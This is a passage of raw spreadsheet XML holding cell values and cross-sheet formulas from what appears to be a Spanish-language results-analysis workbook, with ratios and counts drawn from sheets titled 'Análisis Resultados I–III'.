        <v>2413</v>
      </c>
      <c r="AD26" s="681">
        <f>'(D) - Análisis Resultados I - S'!ET63</f>
        <v>0.8641203704</v>
      </c>
      <c r="AE26" s="831">
        <f>'(D) - Análisis Resultados II - '!DH23</f>
        <v>0</v>
      </c>
      <c r="AF26" s="681">
        <f>'(D) - Análisis Resultados III -'!DI23</f>
        <v>0.2745901639</v>
      </c>
      <c r="AH26" s="753" t="s">
        <v>2413</v>
      </c>
      <c r="AI26" s="69">
        <f>'(D) - Análisis Resultados I - S'!EN64/'(D) - Análisis Resultados I - S'!EN43</f>
        <v>0.1832061069</v>
      </c>
      <c r="AJ26" s="69">
        <f>'(D) - Análisis Resultados II - '!DF23</f>
        <v>1</v>
      </c>
      <c r="AK26" s="306">
        <f>'(D) - Análisis Resultados III -'!DG23</f>
        <v>0.7254098361</v>
      </c>
    </row>
    <row r="27" ht="18.75" customHeight="1">
      <c r="B27" s="806"/>
      <c r="C27" s="807"/>
      <c r="D27" s="828" t="s">
        <v>427</v>
      </c>
      <c r="E27" s="824">
        <v>5.0</v>
      </c>
      <c r="F27" s="824">
        <v>5.0</v>
      </c>
      <c r="G27" s="825">
        <v>5.0</v>
      </c>
      <c r="H27" s="820"/>
      <c r="I27" s="821"/>
    </row>
    <row r="28" ht="18.75" customHeight="1">
      <c r="B28" s="806"/>
      <c r="C28" s="807"/>
      <c r="D28" s="828" t="s">
        <v>209</v>
      </c>
      <c r="E28" s="824">
        <v>17.0</v>
      </c>
      <c r="F28" s="824">
        <v>18.0</v>
      </c>
      <c r="G28" s="825">
        <v>20.0</v>
      </c>
      <c r="H28" s="820"/>
      <c r="I28" s="821"/>
    </row>
    <row r="29" ht="36.0" customHeight="1">
      <c r="B29" s="806"/>
      <c r="C29" s="807"/>
      <c r="D29" s="828" t="s">
        <v>292</v>
      </c>
      <c r="E29" s="824">
        <v>8.0</v>
      </c>
      <c r="F29" s="824">
        <v>8.0</v>
      </c>
      <c r="G29" s="825">
        <v>9.0</v>
      </c>
      <c r="H29" s="820"/>
      <c r="I29" s="821"/>
      <c r="AC29" s="576" t="s">
        <v>2749</v>
      </c>
      <c r="AD29" s="221"/>
      <c r="AE29" s="221"/>
      <c r="AF29" s="222"/>
      <c r="AH29" s="576" t="s">
        <v>2750</v>
      </c>
      <c r="AI29" s="221"/>
      <c r="AJ29" s="221"/>
      <c r="AK29" s="222"/>
    </row>
    <row r="30" ht="18.75" customHeight="1">
      <c r="B30" s="806"/>
      <c r="C30" s="807"/>
      <c r="D30" s="832" t="s">
        <v>1373</v>
      </c>
      <c r="E30" s="833">
        <v>5.0</v>
      </c>
      <c r="F30" s="833">
        <v>9.0</v>
      </c>
      <c r="G30" s="834">
        <v>24.0</v>
      </c>
      <c r="H30" s="820"/>
      <c r="I30" s="821"/>
      <c r="AC30" s="797"/>
      <c r="AD30" s="798" t="s">
        <v>2737</v>
      </c>
      <c r="AE30" s="753" t="s">
        <v>2738</v>
      </c>
      <c r="AF30" s="798" t="s">
        <v>32</v>
      </c>
      <c r="AH30" s="797"/>
      <c r="AI30" s="798" t="s">
        <v>2737</v>
      </c>
      <c r="AJ30" s="753" t="s">
        <v>2738</v>
      </c>
      <c r="AK30" s="798" t="s">
        <v>32</v>
      </c>
    </row>
    <row r="31" ht="18.75" customHeight="1">
      <c r="B31" s="806"/>
      <c r="C31" s="807"/>
      <c r="D31" s="835"/>
      <c r="E31" s="835"/>
      <c r="F31" s="835"/>
      <c r="G31" s="835"/>
      <c r="H31" s="820"/>
      <c r="I31" s="821"/>
      <c r="AC31" s="804" t="s">
        <v>2093</v>
      </c>
      <c r="AD31" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU26</f>
        <v>0.3265306122</v>
      </c>
      <c r="AE31" s="69">
        <f>'(D) - Análisis Resultados II - '!DL9</f>
        <v>0</v>
      </c>
      <c r="AF31" s="306">
        <f>'(D) - Análisis Resultados III -'!DO9</f>
        <v>0.2352941176</v>
      </c>
      <c r="AH31" s="804" t="s">
        <v>2093</v>
      </c>
      <c r="AI31" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO26/'(D) - Análisis Resultados I - S'!EM28</f>
        <v>0.6734693878</v>
      </c>
      <c r="AJ31" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ9</f>
        <v>1</v>
      </c>
      <c r="AK31" s="306">
        <f>'(D) - Análisis Resultados III -'!DN9</f>
        <v>0.7647058824</v>
      </c>
    </row>
    <row r="32" ht="18.75" customHeight="1">
      <c r="B32" s="806"/>
      <c r="C32" s="807"/>
      <c r="D32" s="835"/>
      <c r="E32" s="835"/>
      <c r="F32" s="835"/>
      <c r="G32" s="835"/>
      <c r="H32" s="820"/>
      <c r="I32" s="821"/>
      <c r="AC32" s="804" t="s">
        <v>2013</v>
      </c>
      <c r="AD32" s="69" t="str">
        <f>'(D) - Análisis Resultados I - S'!FU27</f>
        <v>-</v>
      </c>
      <c r="AE32" s="69">
        <f>'(D) - Análisis Resultados II - '!DL10</f>
        <v>0</v>
      </c>
      <c r="AF32" s="306">
        <f>'(D) - Análisis Resultados III -'!DO10</f>
        <v>1</v>
      </c>
      <c r="AH32" s="804" t="s">
        <v>2013</v>
      </c>
      <c r="AI32" s="338" t="s">
        <v>12</v>
      </c>
      <c r="AJ32" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ10</f>
        <v>1</v>
      </c>
      <c r="AK32" s="306">
        <f>'(D) - Análisis Resultados III -'!DN10</f>
        <v>0</v>
      </c>
    </row>
    <row r="33">
      <c r="B33" s="806"/>
      <c r="C33" s="807"/>
      <c r="D33" s="835"/>
      <c r="E33" s="835"/>
      <c r="F33" s="835"/>
      <c r="G33" s="835"/>
      <c r="H33" s="820"/>
      <c r="I33" s="821"/>
      <c r="AC33" s="804" t="s">
        <v>951</v>
      </c>
      <c r="AD33" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU28</f>
        <v>0.2765957447</v>
      </c>
      <c r="AE33" s="69">
        <f>'(D) - Análisis Resultados II - '!DL11</f>
        <v>0</v>
      </c>
      <c r="AF33" s="306">
        <f>'(D) - Análisis Resultados III -'!DO11</f>
        <v>0.1666666667</v>
      </c>
      <c r="AH33" s="804" t="s">
        <v>951</v>
      </c>
      <c r="AI33" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO28/'(D) - Análisis Resultados I - S'!EM30</f>
        <v>0.7234042553</v>
      </c>
      <c r="AJ33" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ11</f>
        <v>1</v>
      </c>
      <c r="AK33" s="306">
        <f>'(D) - Análisis Resultados III -'!DN11</f>
        <v>0.8333333333</v>
      </c>
    </row>
    <row r="34">
      <c r="B34" s="806"/>
      <c r="C34" s="807"/>
      <c r="D34" s="835"/>
      <c r="E34" s="835"/>
      <c r="F34" s="835"/>
      <c r="G34" s="835"/>
      <c r="H34" s="820"/>
      <c r="I34" s="821"/>
      <c r="AC34" s="804" t="s">
        <v>633</v>
      </c>
      <c r="AD34" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU29</f>
        <v>0.3095238095</v>
      </c>
      <c r="AE34" s="69">
        <f>'(D) - Análisis Resultados II - '!DL12</f>
        <v>0</v>
      </c>
      <c r="AF34" s="306">
        <f>'(D) - Análisis Resultados III -'!DO12</f>
        <v>0.4</v>
      </c>
      <c r="AH34" s="804" t="s">
        <v>633</v>
      </c>
      <c r="AI34" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO29/'(D) - Análisis Resultados I - S'!EM31</f>
        <v>0.6904761905</v>
      </c>
      <c r="AJ34" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ12</f>
        <v>1</v>
      </c>
      <c r="AK34" s="306">
        <f>'(D) - Análisis Resultados III -'!DN12</f>
        <v>0.6</v>
      </c>
    </row>
    <row r="35">
      <c r="B35" s="806"/>
      <c r="C35" s="807"/>
      <c r="D35" s="835"/>
      <c r="E35" s="835"/>
      <c r="F35" s="835"/>
      <c r="G35" s="835"/>
      <c r="H35" s="820"/>
      <c r="I35" s="821"/>
      <c r="AC35" s="804" t="s">
        <v>244</v>
      </c>
      <c r="AD35" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU31</f>
        <v>0.5806451613</v>
      </c>
      <c r="AE35" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DL14</f>
        <v>-</v>
      </c>
      <c r="AF35" s="306">
        <f>'(D) - Análisis Resultados III -'!DO14</f>
        <v>0</v>
      </c>
      <c r="AH35" s="804" t="s">
        <v>244</v>
      </c>
      <c r="AI35" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO31/'(D) - Análisis Resultados I - S'!EM33</f>
        <v>0.4193548387</v>
      </c>
      <c r="AJ35" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DJ14</f>
        <v>-</v>
      </c>
      <c r="AK35" s="306">
        <f>'(D) - Análisis Resultados III -'!DN14</f>
        <v>1</v>
      </c>
    </row>
    <row r="36">
      <c r="B36" s="806"/>
      <c r="C36" s="807"/>
      <c r="D36" s="835"/>
      <c r="E36" s="835"/>
      <c r="F36" s="835"/>
      <c r="G36" s="835"/>
      <c r="H36" s="820"/>
      <c r="I36" s="821"/>
      <c r="K36" s="576" t="s">
        <v>2751</v>
      </c>
      <c r="L36" s="221"/>
      <c r="M36" s="221"/>
      <c r="N36" s="221"/>
      <c r="O36" s="221"/>
      <c r="P36" s="221"/>
      <c r="Q36" s="222"/>
      <c r="T36" s="576" t="s">
        <v>2752</v>
      </c>
      <c r="U36" s="221"/>
      <c r="V36" s="221"/>
      <c r="W36" s="221"/>
      <c r="X36" s="221"/>
      <c r="Y36" s="221"/>
      <c r="Z36" s="222"/>
      <c r="AC36" s="804" t="s">
        <v>427</v>
      </c>
      <c r="AD36" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU32</f>
        <v>0.4814814815</v>
      </c>
      <c r="AE36" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DL15</f>
        <v>-</v>
      </c>
      <c r="AF36" s="306">
        <f>'(D) - Análisis Resultados III -'!DO15</f>
        <v>0.4</v>
      </c>
      <c r="AH36" s="804" t="s">
        <v>427</v>
      </c>
      <c r="AI36" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO32/'(D) - Análisis Resultados I - S'!EM34</f>
        <v>0.5185185185</v>
      </c>
      <c r="AJ36" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DJ15</f>
        <v>-</v>
      </c>
      <c r="AK36" s="306">
        <f>'(D) - Análisis Resultados III -'!DN15</f>
        <v>0.6</v>
      </c>
    </row>
    <row r="37">
      <c r="B37" s="806"/>
      <c r="C37" s="807"/>
      <c r="D37" s="835"/>
      <c r="E37" s="835"/>
      <c r="F37" s="835"/>
      <c r="G37" s="835"/>
      <c r="H37" s="820"/>
      <c r="I37" s="821"/>
      <c r="AC37" s="804" t="s">
        <v>1373</v>
      </c>
      <c r="AD37" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU33</f>
        <v>0.5393258427</v>
      </c>
      <c r="AE37" s="69">
        <f>'(D) - Análisis Resultados II - '!DL16</f>
        <v>0</v>
      </c>
      <c r="AF37" s="306">
        <f>'(D) - Análisis Resultados III -'!DO16</f>
        <v>0.2777777778</v>
      </c>
      <c r="AH37" s="804" t="s">
        <v>1373</v>
      </c>
      <c r="AI37" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO33/'(D) - Análisis Resultados I - S'!EM35</f>
        <v>0.4606741573</v>
      </c>
      <c r="AJ37" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ16</f>
        <v>1</v>
      </c>
      <c r="AK37" s="306">
        <f>'(D) - Análisis Resultados III -'!DN16</f>
        <v>0.7222222222</v>
      </c>
    </row>
    <row r="38">
      <c r="B38" s="806"/>
      <c r="C38" s="807"/>
      <c r="D38" s="835"/>
      <c r="E38" s="835"/>
      <c r="F38" s="835"/>
      <c r="G38" s="835"/>
      <c r="H38" s="820"/>
      <c r="I38" s="821"/>
      <c r="L38" s="790" t="s">
        <v>2728</v>
      </c>
      <c r="M38" s="791" t="s">
        <v>2729</v>
      </c>
      <c r="N38" s="791" t="s">
        <v>2730</v>
      </c>
      <c r="O38" s="791" t="s">
        <v>2731</v>
      </c>
      <c r="P38" s="792" t="s">
        <v>2732</v>
      </c>
      <c r="U38" s="836" t="s">
        <v>2728</v>
      </c>
      <c r="V38" s="836" t="s">
        <v>2729</v>
      </c>
      <c r="W38" s="836" t="s">
        <v>2730</v>
      </c>
      <c r="X38" s="836" t="s">
        <v>2731</v>
      </c>
      <c r="Y38" s="837" t="s">
        <v>2733</v>
      </c>
      <c r="Z38" s="42" t="s">
        <v>2732</v>
      </c>
      <c r="AC38" s="804" t="s">
        <v>209</v>
      </c>
      <c r="AD38" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU34</f>
        <v>0.4166666667</v>
      </c>
      <c r="AE38" s="69">
        <f>'(D) - Análisis Resultados II - '!DL17</f>
        <v>0</v>
      </c>
      <c r="AF38" s="306">
        <f>'(D) - Análisis Resultados III -'!DO17</f>
        <v>0.2631578947</v>
      </c>
      <c r="AH38" s="804" t="s">
        <v>209</v>
      </c>
      <c r="AI38" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO34/'(D) - Análisis Resultados I - S'!EM36</f>
        <v>0.5833333333</v>
      </c>
      <c r="AJ38" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ17</f>
        <v>1</v>
      </c>
      <c r="AK38" s="306">
        <f>'(D) - Análisis Resultados III -'!DN17</f>
        <v>0.7368421053</v>
      </c>
    </row>
    <row r="39">
      <c r="B39" s="806"/>
      <c r="C39" s="807"/>
      <c r="D39" s="838"/>
      <c r="E39" s="838"/>
      <c r="F39" s="838"/>
      <c r="G39" s="838"/>
      <c r="H39" s="839"/>
      <c r="I39" s="806"/>
      <c r="K39" s="291" t="s">
        <v>2093</v>
      </c>
      <c r="L39" s="840">
        <f>'(D) - Análisis Resultados I - S'!S139</f>
        <v>0.3351228241</v>
      </c>
      <c r="M39" s="841">
        <f>'(D) - Análisis Resultados I - S'!S138</f>
        <v>0.1684561575</v>
      </c>
      <c r="N39" s="841">
        <f>'(D) - Análisis Resultados I - S'!S137</f>
        <v>0.1684561575</v>
      </c>
      <c r="O39" s="841">
        <f>'(D) - Análisis Resultados I - S'!S136</f>
        <v>0.1666666667</v>
      </c>
      <c r="P39" s="842">
        <f>'(D) - Análisis Resultados II - '!H22</f>
        <v>0.1854618168</v>
      </c>
      <c r="T39" s="291" t="s">
        <v>2093</v>
      </c>
      <c r="U39" s="843">
        <f>'(D) - Análisis Resultados I - S'!S139</f>
        <v>0.3351228241</v>
      </c>
      <c r="V39" s="564">
        <f>'(D) - Análisis Resultados I - S'!S138</f>
        <v>0.1684561575</v>
      </c>
      <c r="W39" s="564">
        <f>'(D) - Análisis Resultados I - S'!S137</f>
        <v>0.1684561575</v>
      </c>
      <c r="X39" s="564">
        <f>'(D) - Análisis Resultados I - S'!S136</f>
        <v>0.1666666667</v>
      </c>
      <c r="Y39" s="844">
        <f>'(D) - Análisis Resultados III -'!H22</f>
        <v>0.6710071942</v>
      </c>
      <c r="Z39" s="69">
        <v>0.18546181677616205</v>
      </c>
      <c r="AC39" s="804" t="s">
        <v>664</v>
      </c>
      <c r="AD39" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU35</f>
        <v>0.3076923077</v>
      </c>
      <c r="AE39" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DL18</f>
        <v>-</v>
      </c>
      <c r="AF39" s="306">
        <f>'(D) - Análisis Resultados III -'!DO18</f>
        <v>0.09090909091</v>
      </c>
      <c r="AH39" s="804" t="s">
        <v>664</v>
      </c>
      <c r="AI39" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO35/'(D) - Análisis Resultados I - S'!EM37</f>
        <v>0.6923076923</v>
      </c>
      <c r="AJ39" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DJ18</f>
        <v>-</v>
      </c>
      <c r="AK39" s="306">
        <f>'(D) - Análisis Resultados III -'!DN18</f>
        <v>0.9090909091</v>
      </c>
    </row>
    <row r="40">
      <c r="B40" s="806"/>
      <c r="C40" s="807"/>
      <c r="D40" s="838"/>
      <c r="E40" s="838"/>
      <c r="F40" s="838"/>
      <c r="G40" s="838"/>
      <c r="H40" s="839"/>
      <c r="I40" s="806"/>
      <c r="K40" s="845" t="s">
        <v>2013</v>
      </c>
      <c r="L40" s="846">
        <f>'(D) - Análisis Resultados I - S'!T139</f>
        <v>0</v>
      </c>
      <c r="M40" s="637">
        <f>'(D) - Análisis Resultados I - S'!T138</f>
        <v>0</v>
      </c>
      <c r="N40" s="637">
        <f>'(D) - Análisis Resultados I - S'!T137</f>
        <v>0</v>
      </c>
      <c r="O40" s="637">
        <f>'(D) - Análisis Resultados I - S'!T136</f>
        <v>0</v>
      </c>
      <c r="P40" s="847">
        <f>'(D) - Análisis Resultados II - '!I22</f>
        <v>0.05366134369</v>
      </c>
      <c r="T40" s="845" t="s">
        <v>2013</v>
      </c>
      <c r="U40" s="848">
        <f>'(D) - Análisis Resultados I - S'!T139</f>
        <v>0</v>
      </c>
      <c r="V40" s="637">
        <f>'(D) - Análisis Resultados I - S'!T138</f>
        <v>0</v>
      </c>
      <c r="W40" s="637">
        <f>'(D) - Análisis Resultados I - S'!T137</f>
        <v>0</v>
      </c>
      <c r="X40" s="637">
        <f>'(D) - Análisis Resultados I - S'!T136</f>
        <v>0</v>
      </c>
      <c r="Y40" s="844">
        <f>'(D) - Análisis Resultados III -'!I22</f>
        <v>0.9997122716</v>
      </c>
      <c r="Z40" s="69">
        <v>0.053661343691555174</v>
      </c>
      <c r="AC40" s="804" t="s">
        <v>357</v>
      </c>
      <c r="AD40" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU36</f>
        <v>0.2857142857</v>
      </c>
      <c r="AE40" s="69">
        <f>'(D) - Análisis Resultados II - '!DL19</f>
        <v>0</v>
      </c>
      <c r="AF40" s="306">
        <f>'(D) - Análisis Resultados III -'!DO19</f>
        <v>0.1</v>
      </c>
      <c r="AH40" s="804" t="s">
        <v>357</v>
      </c>
      <c r="AI40" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO36/'(D) - Análisis Resultados I - S'!EM38</f>
        <v>0.7142857143</v>
      </c>
      <c r="AJ40" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ19</f>
        <v>1</v>
      </c>
      <c r="AK40" s="306">
        <f>'(D) - Análisis Resultados III -'!DN19</f>
        <v>0.9</v>
      </c>
    </row>
    <row r="41">
      <c r="B41" s="806"/>
      <c r="C41" s="807"/>
      <c r="D41" s="838"/>
      <c r="E41" s="838"/>
      <c r="F41" s="838"/>
      <c r="G41" s="838"/>
      <c r="H41" s="839"/>
      <c r="I41" s="806"/>
      <c r="K41" s="845" t="s">
        <v>951</v>
      </c>
      <c r="L41" s="846">
        <f>'(D) - Análisis Resultados I - S'!U139</f>
        <v>0.448433584</v>
      </c>
      <c r="M41" s="637">
        <f>'(D) - Análisis Resultados I - S'!U138</f>
        <v>0.3760526316</v>
      </c>
      <c r="N41" s="637">
        <f>'(D) - Análisis Resultados I - S'!U137</f>
        <v>0.3760526316</v>
      </c>
      <c r="O41" s="637">
        <f>'(D) - Análisis Resultados I - S'!U136</f>
        <v>0.001315789474</v>
      </c>
      <c r="P41" s="847">
        <f>'(D) - Análisis Resultados II - '!J22</f>
        <v>0.9</v>
      </c>
      <c r="T41" s="845" t="s">
        <v>951</v>
      </c>
      <c r="U41" s="848">
        <f>'(D) - Análisis Resultados I - S'!U139</f>
        <v>0.448433584</v>
      </c>
      <c r="V41" s="637">
        <f>'(D) - Análisis Resultados I - S'!U138</f>
        <v>0.3760526316</v>
      </c>
      <c r="W41" s="637">
        <f>'(D) - Análisis Resultados I - S'!U137</f>
        <v>0.3760526316</v>
      </c>
      <c r="X41" s="637">
        <f>'(D) - Análisis Resultados I - S'!U136</f>
        <v>0.001315789474</v>
      </c>
      <c r="Y41" s="844">
        <f>'(D) - Análisis Resultados III -'!J22</f>
        <v>0.5333333333</v>
      </c>
      <c r="Z41" s="69">
        <v>0.9</v>
      </c>
      <c r="AC41" s="804" t="s">
        <v>310</v>
      </c>
      <c r="AD41" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU37</f>
        <v>0.4137931034</v>
      </c>
      <c r="AE41" s="69">
        <f>'(D) - Análisis Resultados II - '!DL20</f>
        <v>0</v>
      </c>
      <c r="AF41" s="306">
        <f>'(D) - Análisis Resultados III -'!DO20</f>
        <v>0.0243902439</v>
      </c>
      <c r="AH41" s="804" t="s">
        <v>310</v>
      </c>
      <c r="AI41" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO37/'(D) - Análisis Resultados I - S'!EM39</f>
        <v>0.5862068966</v>
      </c>
      <c r="AJ41" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ20</f>
        <v>1</v>
      </c>
      <c r="AK41" s="306">
        <f>'(D) - Análisis Resultados III -'!DN20</f>
        <v>0.9756097561</v>
      </c>
    </row>
    <row r="42">
      <c r="B42" s="806"/>
      <c r="C42" s="807"/>
      <c r="D42" s="838"/>
      <c r="E42" s="838"/>
      <c r="F42" s="838"/>
      <c r="G42" s="838"/>
      <c r="H42" s="839"/>
      <c r="I42" s="806"/>
      <c r="K42" s="845" t="s">
        <v>633</v>
      </c>
      <c r="L42" s="846">
        <f>'(D) - Análisis Resultados I - S'!V139</f>
        <v>0.5</v>
      </c>
      <c r="M42" s="637">
        <f>'(D) - Análisis Resultados I - S'!V138</f>
        <v>0.5</v>
      </c>
      <c r="N42" s="637">
        <f>'(D) - Análisis Resultados I - S'!V137</f>
        <v>0.5</v>
      </c>
      <c r="O42" s="637">
        <f>'(D) - Análisis Resultados I - S'!V136</f>
        <v>0</v>
      </c>
      <c r="P42" s="847">
        <f>'(D) - Análisis Resultados II - '!K22</f>
        <v>0.7222222222</v>
      </c>
      <c r="T42" s="845" t="s">
        <v>633</v>
      </c>
      <c r="U42" s="843">
        <f>'(D) - Análisis Resultados I - S'!V139</f>
        <v>0.5</v>
      </c>
      <c r="V42" s="564">
        <f>'(D) - Análisis Resultados I - S'!V138</f>
        <v>0.5</v>
      </c>
      <c r="W42" s="564">
        <f>'(D) - Análisis Resultados I - S'!V137</f>
        <v>0.5</v>
      </c>
      <c r="X42" s="564">
        <f>'(D) - Análisis Resultados I - S'!V136</f>
        <v>0</v>
      </c>
      <c r="Y42" s="844">
        <f>'(D) - Análisis Resultados III -'!K22</f>
        <v>0.5</v>
      </c>
      <c r="Z42" s="69">
        <v>0.7222222222222222</v>
      </c>
      <c r="AC42" s="804" t="s">
        <v>292</v>
      </c>
      <c r="AD42" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU38</f>
        <v>0.4482758621</v>
      </c>
      <c r="AE42" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DL21</f>
        <v>-</v>
      </c>
      <c r="AF42" s="306">
        <f>'(D) - Análisis Resultados III -'!DO21</f>
        <v>0.25</v>
      </c>
      <c r="AH42" s="804" t="s">
        <v>292</v>
      </c>
      <c r="AI42" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO38/'(D) - Análisis Resultados I - S'!EM40</f>
        <v>0.5517241379</v>
      </c>
      <c r="AJ42" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DJ21</f>
        <v>-</v>
      </c>
      <c r="AK42" s="306">
        <f>'(D) - Análisis Resultados III -'!DN21</f>
        <v>0.75</v>
      </c>
    </row>
    <row r="43">
      <c r="B43" s="806"/>
      <c r="C43" s="807"/>
      <c r="D43" s="838"/>
      <c r="E43" s="838"/>
      <c r="F43" s="838"/>
      <c r="G43" s="838"/>
      <c r="H43" s="839"/>
      <c r="I43" s="806"/>
      <c r="K43" s="845" t="s">
        <v>244</v>
      </c>
      <c r="L43" s="846">
        <f>'(D) - Análisis Resultados I - S'!X139</f>
        <v>0.5714285714</v>
      </c>
      <c r="M43" s="637">
        <f>'(D) - Análisis Resultados I - S'!X138</f>
        <v>0.5714285714</v>
      </c>
      <c r="N43" s="637">
        <f>'(D) - Análisis Resultados I - S'!X137</f>
        <v>0</v>
      </c>
      <c r="O43" s="637">
        <f>'(D) - Análisis Resultados I - S'!X136</f>
        <v>0</v>
      </c>
      <c r="P43" s="847">
        <f>'(D) - Análisis Resultados II - '!M22</f>
        <v>0.7142857143</v>
      </c>
      <c r="T43" s="845" t="s">
        <v>244</v>
      </c>
      <c r="U43" s="843">
        <f>'(D) - Análisis Resultados I - S'!X139</f>
        <v>0.5714285714</v>
      </c>
      <c r="V43" s="564">
        <f>'(D) - Análisis Resultados I - S'!X138</f>
        <v>0.5714285714</v>
      </c>
      <c r="W43" s="564">
        <f>'(D) - Análisis Resultados I - S'!X137</f>
        <v>0</v>
      </c>
      <c r="X43" s="564">
        <f>'(D) - Análisis Resultados I - S'!X136</f>
        <v>0</v>
      </c>
      <c r="Y43" s="844">
        <f>'(D) - Análisis Resultados III -'!M22</f>
        <v>0.7142857143</v>
      </c>
      <c r="Z43" s="69">
        <v>0.7142857142857143</v>
      </c>
      <c r="AC43" s="830" t="s">
        <v>558</v>
      </c>
      <c r="AD43" s="69">
        <f>'(D) - Análisis Resultados I - S'!FU39</f>
        <v>0.2291666667</v>
      </c>
      <c r="AE43" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DL22</f>
        <v>-</v>
      </c>
      <c r="AF43" s="306">
        <f>'(D) - Análisis Resultados III -'!DO22</f>
        <v>0.07692307692</v>
      </c>
      <c r="AH43" s="830" t="s">
        <v>558</v>
      </c>
      <c r="AI43" s="69">
        <f>'(D) - Análisis Resultados I - S'!FO39/'(D) - Análisis Resultados I - S'!EM41</f>
        <v>0.7708333333</v>
      </c>
      <c r="AJ43" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DJ22</f>
        <v>-</v>
      </c>
      <c r="AK43" s="306">
        <f>'(D) - Análisis Resultados III -'!DN22</f>
        <v>0.9230769231</v>
      </c>
    </row>
    <row r="44">
      <c r="B44" s="806"/>
      <c r="C44" s="807"/>
      <c r="D44" s="838"/>
      <c r="E44" s="838"/>
      <c r="F44" s="838"/>
      <c r="G44" s="838"/>
      <c r="H44" s="839"/>
      <c r="I44" s="806"/>
      <c r="K44" s="845" t="s">
        <v>427</v>
      </c>
      <c r="L44" s="846">
        <f>'(D) - Análisis Resultados I - S'!Y139</f>
        <v>0.2</v>
      </c>
      <c r="M44" s="637">
        <f>'(D) - Análisis Resultados I - S'!Y138</f>
        <v>0.2</v>
      </c>
      <c r="N44" s="637">
        <f>'(D) - Análisis Resultados I - S'!Y137</f>
        <v>0</v>
      </c>
      <c r="O44" s="637">
        <f>'(D) - Análisis Resultados I - S'!Y136</f>
        <v>0</v>
      </c>
      <c r="P44" s="847">
        <f>'(D) - Análisis Resultados II - '!N22</f>
        <v>0.6</v>
      </c>
      <c r="T44" s="845" t="s">
        <v>427</v>
      </c>
      <c r="U44" s="843">
        <f>'(D) - Análisis Resultados I - S'!Y139</f>
        <v>0.2</v>
      </c>
      <c r="V44" s="564">
        <f>'(D) - Análisis Resultados I - S'!Y138</f>
        <v>0.2</v>
      </c>
      <c r="W44" s="564">
        <f>'(D) - Análisis Resultados I - S'!Y137</f>
        <v>0</v>
      </c>
      <c r="X44" s="564">
        <f>'(D) - Análisis Resultados I - S'!Y136</f>
        <v>0</v>
      </c>
      <c r="Y44" s="844">
        <f>'(D) - Análisis Resultados III -'!N22</f>
        <v>0.4</v>
      </c>
      <c r="Z44" s="69">
        <v>0.6</v>
      </c>
      <c r="AC44" s="805" t="s">
        <v>2413</v>
      </c>
      <c r="AD44" s="414">
        <f>'(D) - Análisis Resultados I - S'!FO42</f>
        <v>0.372519084</v>
      </c>
      <c r="AE44" s="849">
        <f>'(D) - Análisis Resultados II - '!DL23</f>
        <v>0</v>
      </c>
      <c r="AF44" s="415">
        <f>'(D) - Análisis Resultados III -'!DO23</f>
        <v>0.131147541</v>
      </c>
      <c r="AH44" s="805" t="s">
        <v>2413</v>
      </c>
      <c r="AI44" s="414">
        <f>'(D) - Análisis Resultados I - S'!FO41</f>
        <v>0.627480916</v>
      </c>
      <c r="AJ44" s="69">
        <f>'(D) - Análisis Resultados II - '!DJ23</f>
        <v>1</v>
      </c>
      <c r="AK44" s="306">
        <f>'(D) - Análisis Resultados III -'!DN23</f>
        <v>0.868852459</v>
      </c>
    </row>
    <row r="45">
      <c r="B45" s="806"/>
      <c r="C45" s="807"/>
      <c r="D45" s="838"/>
      <c r="E45" s="838"/>
      <c r="F45" s="838"/>
      <c r="G45" s="838"/>
      <c r="H45" s="839"/>
      <c r="I45" s="806"/>
      <c r="K45" s="845" t="s">
        <v>1373</v>
      </c>
      <c r="L45" s="846">
        <f>'(D) - Análisis Resultados I - S'!Z139</f>
        <v>0.3471070467</v>
      </c>
      <c r="M45" s="637">
        <f>'(D) - Análisis Resultados I - S'!Z138</f>
        <v>0.3470256524</v>
      </c>
      <c r="N45" s="637">
        <f>'(D) - Análisis Resultados I - S'!Z137</f>
        <v>0.2417624945</v>
      </c>
      <c r="O45" s="637">
        <f>'(D) - Análisis Resultados I - S'!Z136</f>
        <v>0.08386775763</v>
      </c>
      <c r="P45" s="847">
        <f>'(D) - Análisis Resultados II - '!O22</f>
        <v>0.3684210526</v>
      </c>
      <c r="T45" s="845" t="s">
        <v>1373</v>
      </c>
      <c r="U45" s="843">
        <f>'(D) - Análisis Resultados I - S'!Z139</f>
        <v>0.3471070467</v>
      </c>
      <c r="V45" s="564">
        <f>'(D) - Análisis Resultados I - S'!Z138</f>
        <v>0.3470256524</v>
      </c>
      <c r="W45" s="564">
